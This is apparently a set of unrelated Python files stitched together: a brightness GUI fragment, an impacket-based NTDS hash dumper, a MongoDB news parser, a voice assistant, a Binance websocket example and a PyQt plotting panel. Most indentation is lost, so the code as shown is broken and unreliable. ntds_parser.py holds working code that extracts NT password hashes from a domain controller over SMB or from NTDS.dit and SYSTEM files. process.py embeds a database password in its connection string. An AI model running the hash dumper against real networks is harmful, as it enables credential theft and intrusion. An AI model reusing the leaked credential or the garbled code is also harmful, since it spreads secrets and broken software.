def main(root, WIDTH, HEIGHT, wu, hu):
takeScreenTest = True
if getUserActivity():
with open("userActivity.json", "r") as f:
dataOfActivity = json.load(f)
takeScreenTest = not "ScreenControl" in dataOfActivity
if takeScreenTest:
testScreenBrightness(root, WIDTH, HEIGHT)
else:
showAndControlData(root, WIDTH, HEIGHT, wu, hu)
root.place_forget()
# import ctypes
# ctypes.windll.shcore.SetProcessDpiAwareness(2)
# root = Tk()
# root.geometry("2500x1500");root.title("H")
# testScreenBrightness(root, 2500, 1500)
# root.mainloop()
# mainScreenBrightnessControl()
|
ntds_parser.py
|
import sys, re, itertools, time
from binascii import hexlify
from threading import Thread, Event
from impacket.examples.secretsdump import LocalOperations, RemoteOperations, NTDSHashes
from impacket.smbconnection import SMBConnection, SessionError
from socket import error as socket_error
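# process_remote dumps the NT hashes of a domain controller over SMB: it authenticates with the
# supplied credentials, sets up impacket's RemoteOperations (smbexec) and drives NTDSHashes with a
# per-secret callback that feeds every dumped line through __process_hash, while a spinner thread
# reports progress until the dump completes.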
def process_remote(username, password, target, historic):
hashes = list()
print("Attempting to connect to {}...".format(target))
try:
connection = SMBConnection(target, target)
connection.login(username, password, "", "", "")
ops = RemoteOperations(connection, False, None)
ops.setExecMethod("smbexec")
stopper = Event()
spinner = Thread(target=__update, args=(stopper, hashes))
spinner.start()
NTDSHashes(None, None, isRemote=True, remoteOps=ops, noLMHash=True, useVSSMethod=False,
justNTLM=True, printUserStatus=True, history=historic, lastLogon=True, pwdLastSet=True,
perSecretCallback=lambda type, secret: hashes.append(__process_hash(secret))).dump()
stopper.set()
spinner.join()
if len(hashes) == 0:
raise Exception("Extraction seemingly finished successfully but I didn't find any hashes...")
return __get_domain(hashes), hashes
except socket_error:
raise Exception("Failed to connect to {}".format(target))
except SessionError as e:
if e.error == 3221225581:
raise Exception("Username or password incorrect - please try again.")
def process_local(system, ntds, historic):
hashes = list()
print("Attempting to grab decryption key...")
ops = LocalOperations(system)
try:
bootKey = ops.getBootKey()
except:
raise Exception("Failed to retrieve decryption key. Ensure your SYSTEM hive is correct.")
#print("Found key: 0x{0}.".format(hexlify(bootKey)))
stopper = Event()
spinner = Thread(target=__update, args=(stopper, hashes))
spinner.start()
NTDSHashes(ntds, bootKey, noLMHash=ops.checkNoLMHashPolicy(), useVSSMethod=True, justNTLM=True,
printUserStatus=True, history=historic, lastLogon=True, pwdLastSet=True,
perSecretCallback=lambda type, secret: hashes.append(__process_hash(secret))).dump()
stopper.set()
spinner.join()
return __get_domain(hashes), hashes
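# __process_hash splits a secretsdump output line of the form
#   DOMAIN\user:rid:lmhash:nthash::: (pwdLastSet=...) (status=...) (lastLogon=...)
# into its fields; accounts whose name carries a "_history<N>" suffix are returned as historic
# hashes, everything else keeps its enabled/pwdLastSet/lastLogon metadata.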
def __process_hash(hash):
user, rid, lmhash, nthash, pwdLastSet, enabled, lastLogon = re.findall("(?P<user>.*):(?P<rid>.*):(?P<lmhash>.*):(?P<ntlmhash>.*):::(?:(?: \(pwdLastSet=(?P<pwdLastSet>.*)\))(?: \(status=(?P<enabled>.*)\))(?: \(lastLogon=(?P<lastLogon>.*)\)))?", hash)[0]
history_match = re.match("(?P<user>.*)(_history\d+$)", user)
if history_match:
user = history_match.group(1)
return {"username": user.strip(), "ntlmhash": nthash, "historic": True}
else:
return {"username": user.strip(), "ntlmhash": nthash, "enabled": True if enabled == "Enabled" else False, "passwordLastSet": pwdLastSet, "lastLogon": lastLogon}
def __get_domain(hashes):
return [hash["username"].split("\\")[0] for hash in hashes if "\\" in hash["username"]][0]
def __update(stopper, hashes):
    # Progress spinner: keep cycling through the characters until the caller sets the stop event.
    spinner = itertools.cycle(['-', '/', '|', '\\'])
    while not stopper.is_set():
        sys.stdout.write("[" + next(spinner) + "] (" + str(len(hashes)) + ") Finding and extracting hashes - this might take a few minutes... \r")
        sys.stdout.flush()
        time.sleep(0.2)
|
process.py
|
import multiprocessing
from bs4 import BeautifulSoup, NavigableString, Comment
from lib.common import connectDB, oidList, log, strToDate, sectionName
import sys
import time
host = 'mongodb://user:eDltjgus2004!@192.168.35.153'
chunk = 500
maxProcessNo = 8
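# parseNews is the per-press worker: it repeatedly pulls a chunk of raw article documents for the
# given oid from the newsRaw database, extracts title, body text, summary, categories and
# publish/edit times from the stored HTML with BeautifulSoup, inserts the processed documents into
# the news and category databases, and finally deletes the raw documents it consumed.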
def parseNews(oid, processNo, parsedNo, startTime):
while 1:
try:
log('Process oid=%03d started.' % oid, 0, 0, 0)
newsDB, categoryDB, newsRawDB = connectDB(host)
while 1:
li = list(newsRawDB[str(oid)].find().limit(chunk))
if len(li) == 0:
return
log('Got %d Data from DB at oid=%03d' % (len(li), oid), startTime, processNo,
parsedNo.value)
removeLi = []
processedNews = []
categoryDict = dict()
for news in li:
try:
removeLi.append({'_id': news['_id']})
aid, body, summary = news['aid'], news['body'], news['summary']
summarySoup = BeautifulSoup(summary['summary'], 'html.parser')
summaryText = summarySoup.get_text()
newsText = ""
newsSoup = BeautifulSoup(body, 'html.parser')
bodyEl = newsSoup.find(id="articleBodyContents")
for i in bodyEl:
if type(i) is NavigableString:
newsText += i
elif type(i) is Comment:
pass
else:
if i.name == 'br':
newsText += '\n'
if i.get('data-type') == 'ore':
newsText += i.get_text()
newsText = newsText.replace('\n\n', '\n')
newsText = newsText.replace('\n', ' ')
newsText = newsText.replace(' ', ' ')
                        newsText = newsText.strip()
newsTitle = newsSoup.find(id="articleTitle").get_text().strip()
category = []
for i in newsSoup.find_all("em", {"class": "guide_categorization_item"}):
category.append(sectionName[i.get_text()])
if sectionName[i.get_text()] not in categoryDict:
categoryDict[sectionName[i.get_text()]] = []
categoryDict[sectionName[i.get_text()]].append({
'oid': oid,
'aid': aid
})
publishTime = strToDate(newsSoup.find_all("span", {"class": "t11"})[0].get_text())
if len(newsSoup.find_all("span", {"class": "t11"})) == 2:
editedTime = strToDate(newsSoup.find_all("span", {"class": "t11"})[1].get_text())
else:
editedTime = strToDate(newsSoup.find_all("span", {"class": "t11"})[0].get_text())
processedNews.append({
'newsId': aid,
'title': newsTitle,
'body': newsText,
'summary': summaryText,
'category': category,
'publishTime': publishTime,
'editedTime': editedTime
})
except:
pass
for section, data in categoryDict.items():
categoryDB[section].insert_many(data)
if len(processedNews) > 0:
newsDB[str(oid)].insert_many(processedNews)
parsedNo.value += len(processedNews)
log('Parsed %03d objects in DB at oid=%03d' % (len(processedNews), oid), startTime, processNo,
parsedNo.value)
for remove in removeLi:
newsRawDB[str(oid)].delete_one(remove)
log('Dropped %03d objects in RAW at oid=%03d' % (chunk, oid), startTime, processNo,
parsedNo.value)
except:
pass
if __name__ == '__main__':
multiprocessing.freeze_support()
log('Parser main process started.', time.time(), 0, 0)
thrs = []
cnt = 0
processNo = len(oidList)
parsedNo = multiprocessing.Value('i', 0)
startTime = time.time()
for i in oidList:
if cnt >= processNo:
break
thr = multiprocessing.Process(target=parseNews, args=(i, processNo, parsedNo, startTime))
thrs.append(thr)
thr.start()
cnt += 1
for i in thrs:
i.join()
|
main.py
|
import datetime
import os # os module is used to open files and run commands on the cmd and a lot of other features installation:deafult by python
import webbrowser
import cv2
import pyautogui
import pyttsx3 # pyttsx3 is module for text to speech installation:pip install pyttsx3
import requests
# speechrecogntion is the module which is used for recognizing audio and converting into text installation:pip install speechrecogntion
import speech_recognition as sr
from pyttsx3.drivers import sapi5
import functools
from Feature import *
hour = datetime.datetime.now().hour
class HoverAssist:
def __init__(self) -> None:
self.hour = int(datetime.datetime.now().hour)
self.engine = pyttsx3.init()
self.voices = self.engine.getProperty('voices')
self.engine.setProperty('voice', self.voices[0].id)
def speak(self, audio):
self.engine.say(audio)
print(" ")
print(f"Hover Said: {audio}")
self.engine.runAndWait()
self.engine.stop()
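    # listen() is the wake-word loop: it keeps recording short clips from the microphone and, when
    # Google speech recognition hears "hawa" (or the similar-sounding "how"), it answers and hands
    # control to Analyze() for a single command.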
def listen(self):
while True:
listener = sr.Recognizer()
try:
with sr.Microphone() as source:
audio = listener.listen(source, timeout=1.0)
response = listener.recognize_google(audio)
response = response.lower()
if "hawa" in response or "how" in response:
self.speak("How can I help you?")
self.Analyze()
else:
pass
except sr.WaitTimeoutError:
pass
except sr.UnknownValueError:
pass
except sr.RequestError:
print("Network error.")
def takecommand(self):
listener = sr.Recognizer()
command = ""
try:
with sr.Microphone() as source:
voice = listener.listen(source, phrase_time_limit=4)
command = listener.recognize_google(voice)
print(f"User Said: {command}")
print(" ")
except sr.WaitTimeoutError:
pass
except sr.UnknownValueError:
pass
except sr.RequestError:
print("Network error.")
return command.lower()
@functools.lru_cache()
def wish(self, hour):
        if 0 <= hour < 12:
            self.speak('Good Morning')
        elif 12 <= hour < 15:
            self.speak('Good Afternoon')
else:
self.speak('Good Evening')
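    # Analyze() records one spoken command with takecommand() and dispatches on keywords: opening
    # programs and websites, reporting the time or IP address, Wikipedia/wikiHow lookups, media
    # playback, reminders, alarms, timers and basic system controls such as volume and screenshots.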
def Analyze(self):
query = self.takecommand().lower()
if query == "open notepad":
os.system("notepad")
elif "what is the time" in query:
min = datetime.datetime.now().strftime("%I:%M %p")
self.speak(f"It is {min}")
elif 'browser' in query:
self.speak("opening Browser ")
webbrowser.open("https://www.google.com")
elif 'open cmd' in query or 'open command prompt' in query:
self.speak('Opening CMD')
os.system("start cmd")
elif 'open camera' in query:
self.capture = cv2.VideoCapture(0)
while True:
ret, img = self.capture.read()
cv2.imshow('Camera', img)
k = cv2.waitKey(27)
if k == 27:
break
elif 'close camera' in query:
self.capture.release()
            cv2.destroyAllWindows()
elif 'ip address' in query:
ip = requests.get('https://api.ipify.org').text
self.speak(f"your ip is {ip}")
elif 'wikipedia' in query:
self.speak('Searching Wikipedia')
import wikipedia
query = query.replace('wikipedia', '')
results = wikipedia.summary(query, sentences=3)
            self.speak('According to Wikipedia, ' + results)
elif 'open youtube' in query:
self.speak("Opening Youtube")
webbrowser.open('www.youtube.com')
elif 'open stack overflow' in query:
self.speak("Opening Stackoverflow")
webbrowser.open('www.stackoverflow.com')
elif 'search' in query:
self.speak("Searching The Internet")
search = query.replace("search", "")
webbrowser.open(f'www.google.com/search?q={search}')
elif 'i am going' in query:
self.speak(
"ok i will open ..security camera. to secure your device")
Security_Cam()
elif 'open' in query.lower():
query = query.replace("open", "")
query = query.replace("chrome", "")
self.speak(f"Opening {query} ")
Webopener.webopen(query=query)
elif "weather" in query:
from Feature import Weather
w = Weather()
self.speak(w)
elif 'how' in query:
import pywikihow
how = pywikihow.search_wikihow(query, max_results=1)
assert len(how) == 1
self.speak(how[0].summary)
elif 'shutdown' in query or 'shut down' in query:
self.speak('Shutting Down Windows')
os.system("shutdown /s /t 00")
elif 'switch the window' in query:
self.speak("I'll switch the window for you")
pyautogui.hotkey("Alt", "Tab")
elif 'take a screenshot' in query:
self.speak("taking screenshot buddy")
pyautogui.hotkey("Win", "prtsc")
elif "volume up" in query:
pyautogui.press("volumeup")
elif "volume down" in query:
pyautogui.press("volumedown")
elif "remind me" in query:
import threading
self.speak("What should i remind you for")
name = self.takecommand()
self.speak("When Should I Remind You")
time = self.takecommand()
from Feature import Reminder
tt = time
tt = tt.replace(".", "")
tt = tt.upper()
            h = threading.Thread(target=lambda: Reminder(tt, name))
            h.start()
elif "play" in query:
import pywhatkit
query = query.replace("play", "")
self.speak(f"Playing {query}")
pywhatkit.playonyt(query)
elif "note" in query:
Takenote()
elif "alarm" in query:
self.speak(
"Sir Please Tell Me The Time to set alarm. For Example, Set Alarm to 5:30 A.M")
tt = self.takecommand()
tt = tt.replace("set alarm to ", "")
tt = tt.replace(".", "")
tt = tt.upper()
import threading
m = threading.Thread(target=lambda: Alarm(tt)).start()
elif "timer" in query:
import threading
query = query.replace("set a timer for ", "")
query = query.replace("minutes", "")
query = query.replace("minute", "")
t = threading.Thread(target=lambda: Timer(int(query))).start()
else:
pass
Hover = HoverAssist()
Hover.wish(hour=hour)
Hover.listen()
|
example_binance_coin_futures.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# File: example_binance_coin_futures.py
#
# Part of ‘UNICORN Binance WebSocket API’
# Project website: https://www.lucit.tech/unicorn-binance-websocket-api.html
# Github: https://github.com/LUCIT-Systems-and-Development/unicorn-binance-websocket-api
# Documentation: https://unicorn-binance-websocket-api.docs.lucit.tech
# PyPI: https://pypi.org/project/unicorn-binance-websocket-api/
#
# Author: LUCIT Systems and Development
#
# Copyright (c) 2019-2022, LUCIT Systems and Development (https://www.lucit.tech) and Oliver Zehentleitner
# All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
# Thanks to M3tz3l https://github.com/M3tz3l for sharing this example!
from unicorn_binance_websocket_api.manager import BinanceWebSocketApiManager
import logging
import time
import threading
import os
logging.getLogger("unicorn_binance_websocket_api")
logging.basicConfig(level=logging.DEBUG,
filename=os.path.basename(__file__) + '.log',
format="{asctime} [{levelname:8}] {process} {thread} {module}: {message}",
style="{")
def print_stream_data_from_stream_buffer(binance_websocket_api_manager):
while True:
if binance_websocket_api_manager.is_manager_stopping():
exit(0)
oldest_stream_data_from_stream_buffer = binance_websocket_api_manager.pop_stream_data_from_stream_buffer()
        if oldest_stream_data_from_stream_buffer is False:
            time.sleep(0.01)
        else:
            print(oldest_stream_data_from_stream_buffer)
# create instance of BinanceWebSocketApiManager for Binance.com Futures
binance_websocket_api_manager = BinanceWebSocketApiManager(exchange="binance.com-coin_futures")
# set api key and secret for userData stream
binance_api_key = ""
binance_api_secret = ""
userdata_stream_id = binance_websocket_api_manager.create_stream(["arr"],
["!userData"],
api_key=binance_api_key,
api_secret=binance_api_secret)
bookticker_all_stream_id = binance_websocket_api_manager.create_stream(["arr"], ["!bookTicker"])
# https://binance-docs.github.io/apidocs/delivery/en/#mark-price-of-all-symbols-of-a-pair
stream_id = binance_websocket_api_manager.create_stream(["markPrice@1s"], "btcusd", stream_label="BTCUSD@arr@1s")
symbols = {'btcusd_perp', 'ethusd_perp', 'bnbusd_perp'}
pairs = {'btcusd', 'ethusd', 'bnbusd'}
binance_websocket_api_manager.create_stream(["aggTrade"], symbols)
binance_websocket_api_manager.create_stream(["markPrice"], pairs)
binance_websocket_api_manager.create_stream(["markPriceKline_1m"], symbols)
binance_websocket_api_manager.create_stream(["indexPriceKline_5m"], symbols)
binance_websocket_api_manager.create_stream(["depth5@100ms"], symbols)
binance_websocket_api_manager.create_stream(["depth10"], symbols)
# start a worker process to move the received stream_data from the stream_buffer to a print function
worker_thread = threading.Thread(target=print_stream_data_from_stream_buffer, args=(binance_websocket_api_manager,))
worker_thread.start()
# show an overview
while True:
binance_websocket_api_manager.print_summary()
time.sleep(1)
|
plottingpanel.py
|
import threading
import warnings
import logging
import functools
import re
import darkdetect
from PyQt5 import QtGui, QtWidgets, QtCore
from matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas
import matplotlib.pyplot as plt
import numpy as np
from app.resources import resources
from app.gui.dialogs.dialog_misc import WarningMessageDialog, PromptWithOptionsDialog
from app.gui.dialogs.dialog_plot_file import PlotFileDialog
from app.gui.dialogs.dialog_integrations import IntegrationDialog
from app.gui.gui import Panel, PanelPresenter
from app.model import files, objects, services
from app.util import qt_widgets, qt_constants
class PlottingPanel(Panel, QtWidgets.QWidget):
class SupportPanel(QtWidgets.QDockWidget):
class PlotStyleBox(qt_widgets.CollapsibleBox):
def __init__(self) -> None:
self.title = 'Plot Style'
super().__init__(self.title)
self.all_color_options = QtWidgets.QComboBox()
self.linestyle_options = QtWidgets.QComboBox()
self.fit_linestyle_options = QtWidgets.QComboBox()
self.line_color_options = QtWidgets.QComboBox()
self.fit_color_options = QtWidgets.QComboBox()
self.line_width_options = QtWidgets.QComboBox()
self.marker_options = QtWidgets.QComboBox()
self.marker_color_options = QtWidgets.QComboBox()
self.marker_size_options = QtWidgets.QComboBox()
self.fillstyle_options = QtWidgets.QComboBox()
self.errorbar_style_options = QtWidgets.QComboBox()
self.errorbar_color_options = QtWidgets.QComboBox()
self.errorbar_width_options = QtWidgets.QComboBox()
self._set_tooltips()
self.all_color_options.addItems(services.StyleService.color_options_values.keys())
self.fit_color_options.addItems(services.StyleService.color_options_extra_values.keys())
self.linestyle_options.addItems(services.StyleService.linestyle_options_values.keys())
self.fit_linestyle_options.addItems(services.StyleService.linestyle_options_values.keys())
self.line_color_options.addItems(services.StyleService.color_options_extra_values.keys())
self.line_width_options.addItems(services.StyleService.line_width_options_values.keys())
self.marker_options.addItems(services.StyleService.marker_options_values.keys())
self.marker_color_options.addItems(services.StyleService.color_options_extra_values.keys())
self.marker_size_options.addItems(services.StyleService.marker_size_options_values.keys())
self.fillstyle_options.addItems(services.StyleService.fillstyle_options_values.keys())
self.errorbar_style_options.addItems(services.StyleService.errorbar_styles_values.keys())
self.errorbar_color_options.addItems(services.StyleService.color_options_extra_values.keys())
self.errorbar_width_options.addItems(services.StyleService.errorbar_width_values.keys())
layout = QtWidgets.QGridLayout()
layout.addWidget(QtWidgets.QLabel("Default Color"), 0, 0)
layout.addWidget(self.all_color_options, 0, 1)
layout.addWidget(QtWidgets.QLabel("Linestyle"), 1, 0)
layout.addWidget(self.linestyle_options, 1, 1)
layout.addWidget(QtWidgets.QLabel("Line Width"), 3, 0)
layout.addWidget(self.line_width_options, 3, 1)
layout.addWidget(QtWidgets.QLabel("Marker Style"), 4, 0)
layout.addWidget(self.marker_options, 4, 1)
layout.addWidget(QtWidgets.QLabel("Marker Color"), 5, 0)
layout.addWidget(self.marker_color_options, 5, 1)
layout.addWidget(QtWidgets.QLabel("Marker Size"), 6, 0)
layout.addWidget(self.marker_size_options, 6, 1)
layout.addWidget(QtWidgets.QLabel("Fillstyle"), 7, 0)
layout.addWidget(self.fillstyle_options, 7, 1)
layout.addWidget(QtWidgets.QLabel("Errorbar Style"), 8, 0)
layout.addWidget(self.errorbar_style_options, 8, 1)
layout.addWidget(QtWidgets.QLabel("Errorbar Color"), 9, 0)
layout.addWidget(self.errorbar_color_options, 9, 1)
layout.addWidget(QtWidgets.QLabel("Errorbar Width"), 10, 0)
layout.addWidget(self.errorbar_width_options, 10, 1)
layout.addWidget(QtWidgets.QLabel("Fit Line Color"), 11, 0)
layout.addWidget(self.fit_color_options, 11, 1)
layout.addWidget(QtWidgets.QLabel("Fit Linestyle"), 12, 0)
layout.addWidget(self.fit_linestyle_options, 12, 1)
box_layout = QtWidgets.QHBoxLayout()
box_layout.addLayout(layout)
self.setContentLayout(box_layout)
def _set_tooltips(self):
self.all_color_options.setToolTip("Specify the color for all components of plot for all selected runs")
self.linestyle_options.setToolTip("Specify the style of the plot line for all selected runs")
self.fit_linestyle_options.setToolTip("Specify the style of the fit line for all selected runs")
self.line_color_options.setToolTip("Specify the color of the plot line for all selected runs")
self.fit_color_options.setToolTip("Specify the color of the fit line for all selected runs")
self.line_width_options.setToolTip("Specify the width of the plot line for all selected runs")
self.marker_options.setToolTip("Specify the style of the plot markers for all selected runs")
self.marker_color_options.setToolTip("Specify the color of the plot markers for all selected runs")
self.marker_size_options.setToolTip("Specify the size of the plot markers for all selected runs")
self.fillstyle_options.setToolTip("Specify the fill style of the plot markers for all selected runs")
self.errorbar_style_options.setToolTip("Specify the style of the error bars for all selected runs")
self.errorbar_color_options.setToolTip("Specify the color of the error bars for all selected runs")
self.errorbar_width_options.setToolTip("Specify the width of the error bars for all selected runs")
class AsymmetryParametersBox(qt_widgets.CollapsibleBox):
def __init__(self) -> None:
self.title = 'Asymmetry Parameters'
super().__init__(self.title)
self.alpha_input = QtWidgets.QLineEdit()
self.alpha_input.setToolTip("Specify the alpha value for the selected asymmetries to be corrected with")
layout = QtWidgets.QGridLayout()
layout.addWidget(QtWidgets.QLabel("Alpha"), 0, 0)
layout.addWidget(self.alpha_input, 0, 1)
self.setContentLayout(layout)
class LegendBox(qt_widgets.CollapsibleBox):
def __init__(self) -> None:
self.title = 'Legend'
super().__init__(self.title)
self.legend_list = qt_widgets.ListWidget()
self.__values = {}
box_layout = QtWidgets.QHBoxLayout()
box_layout.addWidget(self.legend_list)
self.setContentLayout(box_layout)
def set_legend(self, values: dict):
if self.__values == values:
return
self.__values = values
self.legend_list.clear()
for run_id, (label, color) in values.items():
qlabel = QtWidgets.QLineEdit()
qlabel.setText(label)
pixmap = QtGui.QPixmap(100, 100)
pixmap.fill(QtGui.QColor(color))
qicon = QtGui.QIcon(pixmap)
qcolor = QtWidgets.QToolButton()
qcolor.setIcon(qicon)
file_item = qt_widgets.IdentifiableListWidgetItem(run_id, label, self.legend_list)
file_item.setIcon(qicon)
# TODO Since we have to set the color as a toolbutton anyways, it would be pretty cool if the user could press it and have
# a color picker pop up to change the color for that particular run.
# TODO We need to make it so we can edit the title, this will involve changing the logic quite a bit though in a few places.
# maybe we can go back to our old idea of attaching references to model objects to things like this... OR we just keep a dict
# in this class that references the actual titles to the ones the user has selected. It would have to be persistent for when
# they clear and plot again. I don't imagine we would want to save these values. OR we could have them choose what they want in
# the legend (like select temp or field or material or title). I like that idea, maybe put the options up at the top of the
# collapsible box.
# file_item.setFlags(file_item.flags() | QtCore.Qt.ItemIsEditable)
def set_blank(self):
self.__values = {}
self.legend_list.clear()
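        # The Tree lists every loaded run as a checkable item; context-menu actions come from the
        # item itself (RunNode.get_actions), and the get_* helpers below collect run ids or titles
        # by iterating the checked or selected items.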
class Tree(QtWidgets.QTreeWidget):
def __init__(self):
super().__init__()
self.__manager = PlottingPanel.SupportPanel.TreeManager(self)
self.setHeaderHidden(True)
self.setContextMenuPolicy(qt_constants.CustomContextMenu)
self.setSelectionMode(QtWidgets.QAbstractItemView.ExtendedSelection)
self.setHorizontalScrollBarPolicy(qt_constants.ScrollBarAsNeeded)
self.header().setMinimumSectionSize(600)
self.header().setDefaultSectionSize(900)
self.header().setStretchLastSection(False)
self._set_callbacks()
def _set_callbacks(self):
self.customContextMenuRequested.connect(self._launch_menu)
def _launch_menu(self, point):
index = self.indexAt(point)
if not index.isValid():
return
item = self.itemAt(point)
actions = item.get_actions()
menu = QtWidgets.QMenu()
for action in actions:
menu.addAction(action[0], functools.partial(action[1], self.selectedItems(), self))
menu.exec_(self.mapToGlobal(point))
def set_tree(self, tree):
self.clear()
self.addTopLevelItems(tree)
def _action_toggle_all_selected(self, new_check_state):
for item in self.selectedItems():
item.setCheckState(0, new_check_state)
def get_run_ids(self):
# noinspection PyTypeChecker
iterator = QtWidgets.QTreeWidgetItemIterator(self, QtWidgets.QTreeWidgetItemIterator.Checked)
ids = []
while iterator.value():
if isinstance(iterator.value().model, objects.RunDataset):
ids.append(iterator.value().model.id)
iterator += 1
return ids
def get_checked(self):
# noinspection PyTypeChecker
iterator = QtWidgets.QTreeWidgetItemIterator(self, QtWidgets.QTreeWidgetItemIterator.Checked)
ids = []
while iterator.value():
if isinstance(iterator.value().model, objects.RunDataset):
ids.append(iterator.value().model.id)
iterator += 1
return ids
def get_selected(self):
# noinspection PyTypeChecker
iterator = QtWidgets.QTreeWidgetItemIterator(self, QtWidgets.QTreeWidgetItemIterator.Selected)
ids = []
while iterator.value():
if isinstance(iterator.value().model, objects.RunDataset):
ids.append(iterator.value().model.id)
iterator += 1
return ids
def get_selected_names(self):
# noinspection PyTypeChecker
iterator = QtWidgets.QTreeWidgetItemIterator(self, QtWidgets.QTreeWidgetItemIterator.Checked)
ids = []
while iterator.value():
if isinstance(iterator.value().model, objects.RunDataset):
ids.append(iterator.value().model.meta[files.TITLE_KEY])
iterator += 1
return ids
def get_names(self):
# noinspection PyTypeChecker
iterator = QtWidgets.QTreeWidgetItemIterator(self)
ids = []
while iterator.value():
if isinstance(iterator.value().model, objects.RunDataset):
ids.append(iterator.value().model.meta[files.TITLE_KEY])
iterator += 1
return ids
def set_all_checked(self, checked):
for i in range(self.topLevelItemCount()):
self.topLevelItem(i).setCheckState(0, checked)
def set_checked_by_ids(self, ids):
# noinspection PyTypeChecker
for i in range(self.topLevelItemCount()):
if self.topLevelItem(i).model.id in ids:
self.topLevelItem(i).setCheckState(0, qt_constants.Checked)
class TreeManager(PanelPresenter):
def __init__(self, view):
super().__init__(view)
self.__view = view
self.__logger = logging.getLogger(__name__)
self.__run_service = services.RunService()
self.__fit_service = services.FitService()
self.__file_service = services.FileService()
self.__run_service.signals.added.connect(self.update)
self.__run_service.signals.loaded.connect(self.update)
self.__run_service.signals.changed.connect(self.update)
def _create_tree_model(self, run_datasets):
run_nodes = []
for dataset in run_datasets:
run_nodes.append(PlottingPanel.SupportPanel.RunNode(dataset))
return run_nodes
@QtCore.pyqtSlot()
def update(self):
ids = self.__view.get_run_ids()
run_datasets = self.__run_service.get_loaded_runs()
tree = self._create_tree_model(run_datasets)
self.__view.set_tree(tree)
self.__view.set_checked_by_ids(ids)
class RunNode(QtWidgets.QTreeWidgetItem):
def __init__(self, run_data):
super(PlottingPanel.SupportPanel.RunNode, self).__init__([run_data.meta[files.TITLE_KEY]])
self.model = run_data
self.__selected_items = None
self.setFlags(self.flags()
| qt_constants.ItemIsUserCheckable)
self.setCheckState(0, qt_constants.Unchecked)
def menu(self, items):
self.__selected_items = items
menu = QtWidgets.QMenu()
# menu.addAction("Plot", self._action_plot)
# menu.addAction("Save", self._action_save)
menu.addAction("Integrate", self._action_integrate)
return menu
def get_actions(self):
actions = [
("Integrate", self._action_integrate)
]
return actions
def _action_integrate(self, items, parent):
ids = [i.model.id for i in items]
if not len(ids): # This shouldn't happen but may as well check. PyQt5 can have glitches.
WarningMessageDialog.launch(["No runs were selected to integrate."])
return
else:
example_meta = items[0].model.meta
sort_keys = [files.TEMPERATURE_KEY, files.FIELD_KEY, files.RUN_NUMBER_KEY]
sort_key_index = PromptWithOptionsDialog.launch(message="Choose the independent variable for the integration",
options=sort_keys)
                    if sort_key_index < 0 or sort_key_index >= len(sort_keys):  # Cancelled the prompt.
return
else:
sort_key = sort_keys[sort_key_index]
if sort_key != files.RUN_NUMBER_KEY:
try:
unit = re.search(r'[a-zA-Z]+\b', example_meta[sort_key])[0]
except (IndexError, TypeError):
unit = ""
try:
integrations = services.RunService().integrate_asymmetries(ids, sort_key)
except Exception as e:
WarningMessageDialog.launch([str(e)])
return
else:
bin_sizes = [
items[0].model.asymmetries[objects.RunDataset.LEFT_BINNED_ASYMMETRY].bin_size,
items[0].model.asymmetries[objects.RunDataset.RIGHT_BINNED_ASYMMETRY].bin_size
]
integration_left = integrations[objects.RunDataset.LEFT_BINNED_ASYMMETRY]
integration_right = integrations[objects.RunDataset.RIGHT_BINNED_ASYMMETRY]
independent_variable = integrations[sort_key]
IntegrationDialog.launch(x_axis=independent_variable,
x_axis_label='Run Number' if sort_key == files.RUN_NUMBER_KEY else f'{sort_key} ({unit})',
integrations=[integration_left, integration_right],
titles=[f'For Binned Asymmetries ({b}ns)' for b in bin_sizes])
def _action_save(self):
pass
def _action_plot(self):
pass
def __init__(self):
super().__init__()
self.setTitleBarWidget(QtWidgets.QWidget())
self.setWindowTitle("Plotting")
self.plot_button = qt_widgets.StyleOneButton("Plot")
self.plot_all_button = qt_widgets.StyleOneButton("Plot All")
self.clear_all_button = qt_widgets.StyleTwoButton("Clear All")
self.item_tree = self.Tree()
self.legend_box = self.LegendBox()
self.plot_style_box = self.PlotStyleBox()
self.asymmetry_param_box = self.AsymmetryParametersBox()
self._set_widget_tooltips()
self._set_widget_dimensions()
self._set_widget_attributes()
self._set_widget_layout()
def _set_widget_tooltips(self):
self.plot_button.setToolTip('Plot selected files')
self.plot_all_button.setToolTip('Plot all files')
self.clear_all_button.setToolTip('Clear all files')
def _set_widget_dimensions(self):
pass
def _set_widget_attributes(self):
self.legend_box.toggle_button.pressed.connect(lambda: self._toggle_boxes(self.legend_box.title))
self.plot_style_box.toggle_button.pressed.connect(lambda: self._toggle_boxes(self.plot_style_box.title))
self.asymmetry_param_box.toggle_button.pressed.connect(
lambda: self._toggle_boxes(self.asymmetry_param_box.title))
self.legend_box.on_pressed()
def _set_widget_layout(self):
hbox = QtWidgets.QHBoxLayout()
hbox.addWidget(self.plot_button)
hbox.addWidget(self.plot_all_button)
hbox.addWidget(self.clear_all_button)
vbox = QtWidgets.QVBoxLayout()
vbox.addLayout(hbox)
vbox.addWidget(self.item_tree)
vbox.addWidget(self.legend_box)
vbox.addWidget(self.plot_style_box)
vbox.addWidget(self.asymmetry_param_box)
vbox.addStretch()
temp = QtWidgets.QWidget()
temp.setLayout(vbox)
self.setWidget(temp)
def _toggle_boxes(self, box_id):
if box_id != self.legend_box.title and self.legend_box.is_open():
self.legend_box.on_pressed()
elif box_id != self.plot_style_box.title and self.plot_style_box.is_open():
self.plot_style_box.on_pressed()
elif box_id != self.asymmetry_param_box.title and self.asymmetry_param_box.is_open():
self.asymmetry_param_box.on_pressed()
if box_id == self.legend_box.title:
self.legend_box.on_pressed()
